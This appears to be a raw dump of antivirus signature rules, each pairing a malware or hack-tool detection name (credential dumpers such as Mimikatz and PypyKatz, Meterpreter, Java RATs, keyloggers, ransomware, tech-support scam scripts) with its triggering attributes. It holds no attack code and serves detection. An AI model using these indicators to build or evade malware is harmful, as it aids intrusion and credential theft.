V!#AGGR:Tobeet_Msil_034E3D19HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV4&HSTR:InstallerFile&HSTR:FileSharingURL !#AGGR:Tobeet_Msil_1257EC0AHSTR:MSIL.MyNamespace&pea_ismsil&LUA:SuspVerinfo1&HSTR:VirTool:Win32/VBInject.gen!AN.2 V!#AGGR:Tobeet_Msil_1257EC0AHSTR:MSIL.MyNamespace&pea_ismsil&LUA:SuspVerinfo1&HSTR:VirTool:Win32/VBInject.gen!AN.2 !#AGGR:Tobeet_Msil_1EFCCCA2pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_CD3D81BD V!#AGGR:Tobeet_Msil_1EFCCCA2pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_CD3D81BD !#AGGR:Tobeet_Msil_270647FBpea_ismsil&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:MSIL/Malicious.Decryption.A V!#AGGR:Tobeet_Msil_270647FBpea_ismsil&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:MSIL/Malicious.Decryption.A !#AGGR:Tobeet_Msil_7ECD5743pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:VirTool:MSIL/Obfuscator.S06 V!#AGGR:Tobeet_Msil_7ECD5743pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&HSTR:VirTool:MSIL/Obfuscator.S06 !#AGGR:Tobeet_Msil_B76B6839pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_B92F0590 V!#AGGR:Tobeet_Msil_B76B6839pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_B92F0590 !#ALF:AGGR:HTML/TechTitle.ASCRIPT:HTML/TechTitle.A&(SCRIPT:HTML/TechMsgTollfree.A|SCRIPT:HTML/TechMsgLeavePage.D) V!#ALF:AGGR:HTML/TechTitle.ASCRIPT:HTML/TechTitle.A&(SCRIPT:HTML/TechMsgTollfree.A|SCRIPT:HTML/TechMsgLeavePage.D) !#TEL:Trojan:Java/Jrat.G!wimLua:Java.SuspiciousCrypter.JRAT.B&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass U!#TEL:Trojan:Java/Jrat.G!wimLua:Java.SuspiciousCrypter.JRAT.B&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass !#TEL:Trojan:Java/Jrat.H!wimLua:Java.SuspiciousCrypter.JRAT.C&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass U!#TEL:Trojan:Java/Jrat.H!wimLua:Java.SuspiciousCrypter.JRAT.C&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass !#TEL:Trojan:Java/Jrat.J!wimLua:Java.SuspiciousCrypter.JRAT.E&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass U!#TEL:Trojan:Java/Jrat.J!wimLua:Java.SuspiciousCrypter.JRAT.E&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass !#TEL:Trojan:Java/Jrat.L!wimLua:Java.SuspiciousCrypter.JRAT.G&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass U!#TEL:Trojan:Java/Jrat.L!wimLua:Java.SuspiciousCrypter.JRAT.G&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass !#TEL:Trojan:Java/Qrat.A!wimLua:Java.SuspiciousCrypter.QRAT.B&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass U!#TEL:Trojan:Java/Qrat.A!wimLua:Java.SuspiciousCrypter.QRAT.B&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass !#//AGGR:JarFileWithMoreThan100ClassBM_ZIP_FILE&Lua:JARExt&Lua:MoreThan100FilesFoldersInZip&LUA:FileSizeGT80000.A u$M!#//AGGR:JarFileWithMoreThan100ClassBM_ZIP_FILE&Lua:JARExt&Lua:MoreThan100FilesFoldersInZip&LUA:FileSizeGT80000.A !#HackTool:PowerShell/Powersploit!LowfiHackTool:PowerShell/Mikatz.1!Lowfi&HackTool:PowerShell/Powersploit.2!Lowfi u'J!#HackTool:PowerShell/Powersploit!LowfiHackTool:PowerShell/Mikatz.1!Lowfi&HackTool:PowerShell/Powersploit.2!Lowfi !#ALF:IOAVTopLevelRarHasFileWithExeExtensionRPF:AnyFileHasIOAVURL&RPF:TopLevelFile&Lua:RarHasFileWithExeExtension u,E!#ALF:IOAVTopLevelRarHasFileWithExeExtensionRPF:AnyFileHasIOAVURL&RPF:TopLevelFile&Lua:RarHasFileWithExeExtension !#SLFPER:Trojan:Win32/Meterpreter!ole32_APIsHSTR:Win32/Meterpreter!ole32_APIs&HSTR:Win32/Meterpreter!ApiRetrieval u,E!#SLFPER:Trojan:Win32/Meterpreter!ole32_APIsHSTR:Win32/Meterpreter!ole32_APIs&HSTR:Win32/Meterpreter!ApiRetrieval !#SLF:Lua/ContextFifonia.B!locallowappdata_dllRPF:TopLevelFile&Lua:ContextFileInFirstFolder.B!locallowappdata_dll u.C!#SLF:Lua/ContextFifonia.B!locallowappdata_dllRPF:TopLevelFile&Lua:ContextFileInFirstFolder.B!locallowappdata_dll !#SLF:Lua/ContextFifonia.B!locallowappdata_exeRPF:TopLevelFile&Lua:ContextFileInFirstFolder.B!locallowappdata_exe u.C!#SLF:Lua/ContextFifonia.B!locallowappdata_exeRPF:TopLevelFile&Lua:ContextFileInFirstFolder.B!locallowappdata_exe !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_odtLua:OfficeExtractedFileInZip.A!rar_odt&MHSTR:MacroInside u98!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_odtLua:OfficeExtractedFileInZip.A!rar_odt&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_xmlLua:OfficeExtractedFileInZip.A!rar_xml&MHSTR:MacroInside u98!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_xmlLua:OfficeExtractedFileInZip.A!rar_xml&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_odtLua:OfficeExtractedFileInZip.A!zip_odt&MHSTR:MacroInside u98!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_odtLua:OfficeExtractedFileInZip.A!zip_odt&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_xmlLua:OfficeExtractedFileInZip.A!zip_xml&MHSTR:MacroInside u98!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_xmlLua:OfficeExtractedFileInZip.A!zip_xml&MHSTR:MacroInside !#AGGR:Tobeet_Msil_165C791CHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&ATTRIBUTE:SIGA:MSIL:EMAIL:S1 W!#AGGR:Tobeet_Msil_165C791CHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&ATTRIBUTE:SIGA:MSIL:EMAIL:S1 !#AGGR:Tobeet_Msil_ECAF0AEBHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:VirTool:Win32/AscUrlExe W!#AGGR:Tobeet_Msil_ECAF0AEBHSTR:MSIL.MyNamespace&pea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:VirTool:Win32/AscUrlExe !#TEL:AGGR:HTML/TechBrolo.BISCRIPT:JS/RequestFullScreen.A&(SCRIPT:JS/TechAlertCode.C|SCRIPT:JS/TechMsgAlertCode.A) V!#TEL:AGGR:HTML/TechBrolo.BISCRIPT:JS/RequestFullScreen.A&(SCRIPT:JS/TechAlertCode.C|SCRIPT:JS/TechMsgAlertCode.A) !#TEL:SupportScam:JS/TechBrolo.ESCRIPT:JS/TechMsgVarCode.B&(SCRIPT:JS/TechMsgVarCode.A|SCRIPT:JS/TechMsgVarCode.C) v R!#TEL:SupportScam:JS/TechBrolo.ESCRIPT:JS/TechMsgVarCode.B&(SCRIPT:JS/TechMsgVarCode.A|SCRIPT:JS/TechMsgVarCode.C) !#AGGR:Program:Win32/NSISChecksDeepFreeze(HSTR:NSIS_Installer|HSTR:NSIS.gen!A)&HSTR:Program:Win32/ChecksDeepFreeze v)I!#AGGR:Program:Win32/NSISChecksDeepFreeze(HSTR:NSIS_Installer|HSTR:NSIS.gen!A)&HSTR:Program:Win32/ChecksDeepFreeze !#TEL:SCRIPT/WmiLaunchCertutil_Urlcache.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchCertutil_Urlcache v)I!#TEL:SCRIPT/WmiLaunchCertutil_Urlcache.AMpIsWmiAMSIScan&SCRIPT:WmiCreateProcess&SCRIPT:WmiLaunchCertutil_Urlcache !#ALF:IOAVTopLevelRarWithFileNameWithPasswordRPF:AnyFileHasIOAVURL&RPF:TopLevelFile&Lua:RarHasFileNameWithPassword v-E!#ALF:IOAVTopLevelRarWithFileNameWithPasswordRPF:AnyFileHasIOAVURL&RPF:TopLevelFile&Lua:RarHasFileNameWithPassword !#SLF:Python/PypyKatz.ASCRIPT:PypyKatz!helper1&SCRIPT:PypyKatz!helper2&SCRIPT:PypyKatz!commons&SCRIPT:PypyKatz!args \\!#SLF:Python/PypyKatz.ASCRIPT:PypyKatz!helper1&SCRIPT:PypyKatz!helper2&SCRIPT:PypyKatz!commons&SCRIPT:PypyKatz!args !#AGGR:Tobeet_Msil_79F0F8AFpea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/ClassRijndaelManaged.A&HSTR:MSIL/Confuser X!#AGGR:Tobeet_Msil_79F0F8AFpea_ismsil&AGGR:Lua:MSIL:FrameworkV4&HSTR:MSIL/ClassRijndaelManaged.A&HSTR:MSIL/Confuser !#TEL:Trojan:VBS/Tisifi.ECBLua:ContextualDropFileByEmailClient&Lua:SingleFileVBSInZip&Lua:ContextVBSDoubleExtension X!#TEL:Trojan:VBS/Tisifi.ECBLua:ContextualDropFileByEmailClient&Lua:SingleFileVBSInZip&Lua:ContextVBSDoubleExtension !#TEL:TrojanDropper:JS/Tetomek.ASCRIPT:JS/TetomekSpecialFolders.A&(SCRIPT:JS/TetomekOpen.A|SCRIPT:JS/TetomekOpen.B) w S!#TEL:TrojanDropper:JS/Tetomek.ASCRIPT:JS/TetomekSpecialFolders.A&(SCRIPT:JS/TetomekOpen.A|SCRIPT:JS/TetomekOpen.B) !#TEL:TrojanDownloader:JS/Tisifi.DLua:ContextFromWebmail&!SCPT:Nemucod_exclusion&Lua:FileInZip&SuspiciousJSfilename w\"Q!#TEL:TrojanDownloader:JS/Tisifi.DLua:ContextFromWebmail&!SCPT:Nemucod_exclusion&Lua:FileInZip&SuspiciousJSfilename !#AGGR:Torrent:Win32/TransmissionTorrentHSTR:Torrent:Win32/TransmissionTorrent|PUA:Torrent:CERT:TransmissionTorrent w(K!#AGGR:Torrent:Win32/TransmissionTorrentHSTR:Torrent:Win32/TransmissionTorrent|PUA:Torrent:CERT:TransmissionTorrent !#SLFPER:Trojan:Win32/Meterpreter!ws2_32_APIsHSTR:Win32/Meterpreter!ws2_32_APIs&HSTR:Win32/Meterpreter!ApiRetrieval w-F!#SLFPER:Trojan:Win32/Meterpreter!ws2_32_APIsHSTR:Win32/Meterpreter!ws2_32_APIs&HSTR:Win32/Meterpreter!ApiRetrieval !#SLFPER:Trojan:Win64/Meterpreter!ws2_32_APIsHSTR:Win64/Meterpreter!ws2_32_APIs&HSTR:Win64/Meterpreter!ApiRetrieval w-F!#SLFPER:Trojan:Win64/Meterpreter!ws2_32_APIsHSTR:Win64/Meterpreter!ws2_32_APIs&HSTR:Win64/Meterpreter!ApiRetrieval !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_odtLua:OfficeExtractedFileInZip.A!7zip_odt&MHSTR:MacroInside w:9!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_odtLua:OfficeExtractedFileInZip.A!7zip_odt&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_xmlLua:OfficeExtractedFileInZip.A!7zip_xml&MHSTR:MacroInside w:9!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_xmlLua:OfficeExtractedFileInZip.A!7zip_xml&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_wordLua:OfficeExtractedFileInZip.A!rar_word&MHSTR:MacroInside w:9!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_wordLua:OfficeExtractedFileInZip.A!rar_word&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_odtLua:OfficeExtractedFileInZip.A!wzip_odt&MHSTR:MacroInside w:9!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_odtLua:OfficeExtractedFileInZip.A!wzip_odt&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_xmlLua:OfficeExtractedFileInZip.A!wzip_xml&MHSTR:MacroInside w:9!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_xmlLua:OfficeExtractedFileInZip.A!wzip_xml&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_wordLua:OfficeExtractedFileInZip.A!zip_word&MHSTR:MacroInside w:9!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_wordLua:OfficeExtractedFileInZip.A!zip_word&MHSTR:MacroInside !#TEL:Starter.P!shellSCRIPT:Starter.P!shell1|SCRIPT:Starter.P!shell2|SCRIPT:Starter.P!shell3|SCRIPT:Starter.P!shell4 _!#TEL:Starter.P!shellSCRIPT:Starter.P!shell1|SCRIPT:Starter.P!shell2|SCRIPT:Starter.P!shell3|SCRIPT:Starter.P!shell4 !#AGGR:Tobeet_Msil_04AAD51BHSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_7D94E821 Y!#AGGR:Tobeet_Msil_04AAD51BHSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_7D94E821 !#AGGR:Tobeet_Msil_1B60B7CCHSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_691D8306 Y!#AGGR:Tobeet_Msil_1B60B7CCHSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_691D8306 !#AGGR:Tobeet_Msil_32386C9EHSTR:VirTool:Win32/VBInject.gen!AN.2&HSTR:Win32/PossibleKeylogger.B2&HSTR:Tobeet_73500EEA Y!#AGGR:Tobeet_Msil_32386C9EHSTR:VirTool:Win32/VBInject.gen!AN.2&HSTR:Win32/PossibleKeylogger.B2&HSTR:Tobeet_73500EEA !#AGGR:Tobeet_Msil_374CFA89HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_D089F745 Y!#AGGR:Tobeet_Msil_374CFA89HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_D089F745 !#AGGR:Tobeet_Msil_44BA92C8HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_B92F0590 Y!#AGGR:Tobeet_Msil_44BA92C8HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:Tobeet_Msil_B92F0590 !#AGGR:Tobeet_Msil_48DA07A3HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo&HSTR:Tobeet_Msil_D089F745 Y!#AGGR:Tobeet_Msil_48DA07A3HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo&HSTR:Tobeet_Msil_D089F745 !#AGGR:Tobeet_Msil_50E8A481HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_2AB9207D Y!#AGGR:Tobeet_Msil_50E8A481HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_2AB9207D !#AGGR:Tobeet_Msil_9F320385HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_C92B42E3 Y!#AGGR:Tobeet_Msil_9F320385HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_C92B42E3 !#AGGR:Tobeet_Msil_C9232DEDpea_ismsil&HSTR:InstallerFile&HSTR:MSIL/NameSpace.CompilerServices.A&HSTR:Tobeet_D30D3546 Y!#AGGR:Tobeet_Msil_C9232DEDpea_ismsil&HSTR:InstallerFile&HSTR:MSIL/NameSpace.CompilerServices.A&HSTR:Tobeet_D30D3546 !#AGGR:Tobeet_Msil_D0492770HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_5F70D070 Y!#AGGR:Tobeet_Msil_D0492770HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:Tobeet_Msil_5F70D070 !#AGGR:Tobeet_Msil_DCD66CE4HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:PossibleDownloader.A Y!#AGGR:Tobeet_Msil_DCD66CE4HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:PossibleDownloader.A !#AGGR:Tobeet_Msil_E8DF44A7pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/NameSpace.CompilerServices.A&HSTR:Tobeet_AC2BC191 Y!#AGGR:Tobeet_Msil_E8DF44A7pea_ismsil&HSTR:InstallerFile&HSTR:MSIL/NameSpace.CompilerServices.A&HSTR:Tobeet_AC2BC191 !#TEL:AGGR:JS/TechAlertCode.ASCRIPT:JS/TechMsgAlertCode.A&SCRIPT:HTML/TechMsgSubject.A&SCRIPT:HTML/TechMsgTollfree.A W!#TEL:AGGR:JS/TechAlertCode.ASCRIPT:JS/TechMsgAlertCode.A&SCRIPT:HTML/TechMsgSubject.A&SCRIPT:HTML/TechMsgTollfree.A !#SLF:Lua/ContextSafifonia.B!locallowappdata_exeRPF:TopLevelFile&Lua:ContextSameFileFolderName.B!locallowappdata_exe x0D!#SLF:Lua/ContextSafifonia.B!locallowappdata_exeRPF:TopLevelFile&Lua:ContextSameFileFolderName.B!locallowappdata_exe !#AGGR:ZwangiNsisHSTR:NSIS_Installer&(HSTR:ZwangiUrlArgs|HSTR:Zwangi_NSISStrings|STATIC:ZwangiBmp|HSTR:ZwangiDomains) d!#AGGR:ZwangiNsisHSTR:NSIS_Installer&(HSTR:ZwangiUrlArgs|HSTR:Zwangi_NSISStrings|STATIC:ZwangiBmp|HSTR:ZwangiDomains) !#TEL:Trojan:Java/Qrat.AInEmail&Lua:Java.SuspiciousCrypter.QRAT.B&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass ]!#TEL:Trojan:Java/Qrat.AInEmail&Lua:Java.SuspiciousCrypter.QRAT.B&SIGATTR:Java:Cipher.doFinal&!AGGR:CombinedJavaClass !#AGGR:Tobeet_Msil_0659D9BBpea_ismsil&HSTR:MSIL/Obfuscator.Confuser.C&HSTR:MSIL/PossibleKeylogger.A5&LUA:SuspVerinfo1 Z!#AGGR:Tobeet_Msil_0659D9BBpea_ismsil&HSTR:MSIL/Obfuscator.Confuser.C&HSTR:MSIL/PossibleKeylogger.A5&LUA:SuspVerinfo1 !#AGGR:Tobeet_Msil_17B6A0ADHSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:AutoAttrMsil_326AB74D Z!#AGGR:Tobeet_Msil_17B6A0ADHSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:AutoAttrMsil_326AB74D !#AGGR:Tobeet_Msil_476469E2HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo1&HSTR:Tobeet_Msil_5741E837 Z!#AGGR:Tobeet_Msil_476469E2HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo1&HSTR:Tobeet_Msil_5741E837 !#AGGR:Tobeet_Msil_4B753B36HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:AutoAttrMsil_EF8EE190 Z!#AGGR:Tobeet_Msil_4B753B36HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:AutoAttrMsil_EF8EE190 !#AGGR:Tobeet_Msil_56A1F829pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo&HSTR:CoinMiner!bit Z!#AGGR:Tobeet_Msil_56A1F829pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo&HSTR:CoinMiner!bit !#AGGR:Tobeet_Msil_61EF0742HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:AutoAttrMsil_1F6F7011 Z!#AGGR:Tobeet_Msil_61EF0742HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&HSTR:AutoAttrMsil_1F6F7011 !#AGGR:Tobeet_Msil_697F93B7pea_ismsil&HSTR:InstallerFile&LUA:SuspVerinfo1&HSTR:Win32/WMI.Class.Win32_ComputerSystem.A Z!#AGGR:Tobeet_Msil_697F93B7pea_ismsil&HSTR:InstallerFile&LUA:SuspVerinfo1&HSTR:Win32/WMI.Class.Win32_ComputerSystem.A !#AGGR:Tobeet_Msil_981B20B9HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&RANSMATTR:PeLodNoException Z!#AGGR:Tobeet_Msil_981B20B9HSTR:MSIL.MyNamespace&pea_ismsil&HSTR:MSIL/PossibleKeylogger.A5&RANSMATTR:PeLodNoException !#AGGR:Tobeet_Msil_9996C614HSTR:MSIL.MyNamespace&pea_ismsil&LUA:SuspVerinfo1&AGGR:Lua:MSIL:FrameworkV4&SIGATTR:DropMZ Z!#AGGR:Tobeet_Msil_9996C614HSTR:MSIL.MyNamespace&pea_ismsil&LUA:SuspVerinfo1&AGGR:Lua:MSIL:FrameworkV4&SIGATTR:DropMZ !#AGGR:Tobeet_Msil_E852EDDEHSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:AutoAttrMsil_8AE2833D Z!#AGGR:Tobeet_Msil_E852EDDEHSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&HSTR:AutoAttrMsil_8AE2833D !#AGGR:Tobeet_Msil_FB773CB2HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&VirTool:MSIL/Obfuscator.AO Z!#AGGR:Tobeet_Msil_FB773CB2HSTR:MSIL.MyNamespace&AGGR:Lua:MSIL:FrameworkV2&LUA:SuspVerinfo&VirTool:MSIL/Obfuscator.AO !#SLF:AsmblyLoadInvoke!amsiSCRIPT:assemblyload&SCRIPT:PS/WebDlData.A&SCRIPT:PS/GetTypeMetInv.A&MpIsPowerShellAMSIScan Z!#SLF:AsmblyLoadInvoke!amsiSCRIPT:assemblyload&SCRIPT:PS/WebDlData.A&SCRIPT:PS/GetTypeMetInv.A&MpIsPowerShellAMSIScan !#PUA:Staged:CertificatesGBLPUA:PoorCertRep:NewCandidates|PUA:PoorCertRep:ML1|PUA:PoorCertRep:ML2|PUA:PoorCertRep:ML3 Y!#PUA:Staged:CertificatesGBLPUA:PoorCertRep:NewCandidates|PUA:PoorCertRep:ML1|PUA:PoorCertRep:ML2|PUA:PoorCertRep:ML3 !#ALF:Trojan:Win32/Pchild10.AVirTool:Win32/Pchild10.keya&VirTool:Win32/Pchild10.keyb&VirTool:Win32/Pchild10.delimeter X!#ALF:Trojan:Win32/Pchild10.AVirTool:Win32/Pchild10.keya&VirTool:Win32/Pchild10.keyb&VirTool:Win32/Pchild10.delimeter !#ALFPER:AGGR:Win32/Sasquor.BLua:SasquorFileName.A&!Clean:Confident:Cert:Unvalidated&!Clean:Confident:Cert:NotChecked X!#ALFPER:AGGR:Win32/Sasquor.BLua:SasquorFileName.A&!Clean:Confident:Cert:Unvalidated&!Clean:Confident:Cert:NotChecked !#TEL:Trojan:Win32/Tisifi.ECALua:ContextualDropFileByEmailClient&Lua:SingleFileExeInZip&Lua:ContextEXEDoubleExtension X!#TEL:Trojan:Win32/Tisifi.ECALua:ContextualDropFileByEmailClient&Lua:SingleFileExeInZip&Lua:ContextEXEDoubleExtension !#TEL:PWS:HTML/STRCredHarv.A!dhaSCPT:STRCredHarv1&SCPT:STRCredHarv2&SCPT:STRCredHarv3&SCPT:STRCredHarv4&SCPT:HTMLFile y U!#TEL:PWS:HTML/STRCredHarv.A!dhaSCPT:STRCredHarv1&SCPT:STRCredHarv2&SCPT:STRCredHarv3&SCPT:STRCredHarv4&SCPT:HTMLFile !#AllowList:Aggr/InternalSkypeToolHSTR:SkypeTool_1&LUA:FileSizeGT8M.A&Path:DriveNonC&HSTR:PyInstaller_Packaged_Script y\"S!#AllowList:Aggr/InternalSkypeToolHSTR:SkypeTool_1&LUA:FileSizeGT8M.A&Path:DriveNonC&HSTR:PyInstaller_Packaged_Script !#AGGR:VirTool:Win32/NSISInjector.ASCRIPT:VirTool:Win32/NSISInjector.A!param&SCRIPT:VirTool:Win32/NSISInjector.A!file y#R!#AGGR:VirTool:Win32/NSISInjector.ASCRIPT:VirTool:Win32/NSISInjector.A!param&SCRIPT:VirTool:Win32/NSISInjector.A!file !#AGGREGATOR:LowfiDelfCPLWithException(!HSTR:DelfCPLException)&MpCPlApplet&(HSTR:Win32/DelphiFile|SIGATTR:DelphiFile) y&O!#AGGREGATOR:LowfiDelfCPLWithException(!HSTR:DelfCPLException)&MpCPlApplet&(HSTR:Win32/DelphiFile|SIGATTR:DelphiFile) !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_wordLua:OfficeExtractedFileInZip.A!7zip_word&MHSTR:MacroInside y;:!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!7zip_wordLua:OfficeExtractedFileInZip.A!7zip_word&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_excelLua:OfficeExtractedFileInZip.A!rar_excel&MHSTR:MacroInside y;:!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!rar_excelLua:OfficeExtractedFileInZip.A!rar_excel&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_wordLua:OfficeExtractedFileInZip.A!wzip_word&MHSTR:MacroInside y;:!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!wzip_wordLua:OfficeExtractedFileInZip.A!wzip_word&MHSTR:MacroInside !#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_excelLua:OfficeExtractedFileInZip.A!zip_excel&MHSTR:MacroInside y;:!#SLFPER:O97M/OfficeWithMacroExtractedFileInZip.A!zip_excelLua:OfficeExtractedFileInZip.A!zip_excel&MHSTR:MacroInside !#AGGR:JS/TechAlertCode.ASCRIPT:JS/TechMsgAlertCode.A&(SCRIPT:JS/TechAudioLoopTag.A|SCRIPT:JS/TechUnloadBrowserCode.A) ]!#AGGR:JS/TechAlertCode.ASCRIPT:JS/TechMsgAlertCode.A&(SCRIPT:JS/TechAudioLoopTag.A|SCRIPT:JS/TechUnloadBrowserCode.A) !#ATTR:MACE:ShouldDetonateDetection:Ransom:Win32/Revil.A|Detection:Ransom:Win32/Revil.B|Detection:Ransom:Win32/Revil.C \\!#ATTR:MACE:ShouldDetonateDetection:Ransom:Win32/Revil.A|Detection:Ransom:Win32/Revil.B|Detection:Ransom:Win32/Revil.C !#AGGR:Tobeet_Msil_40B079B8pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&SIGATTR:MSIL/AVChk [!#AGGR:Tobeet_Msil_40B079B8pea_ismsil&HSTR:InstallerFile&AGGR:Lua:MSIL:FrameworkV4&LUA:SuspVerinfo1&SIGATTR:MSIL/AVChk !#SLFPER:UnsignedPETopLevelIOAVRPF:PEHasIOAVURL&RPF:TopLevelFile&!PEPCODE:HasDigitalSignature&!Lua:IOAVBrowserUtorrent W!#SLFPER:UnsignedPETopLevelIOAVRPF:PEHasIOAVURL&RPF:TopLevelFile&!PEPCODE:HasDigitalSignature&!Lua:IOAVBrowserUtorrent !#TEL:Exploit:O97M/CVE-2017-11882.N!wimLua:Equation3InRTF&SCRIPT:OLE.EquationCLSID&SCRIPT:Equation3_Overflow_WinExec.A 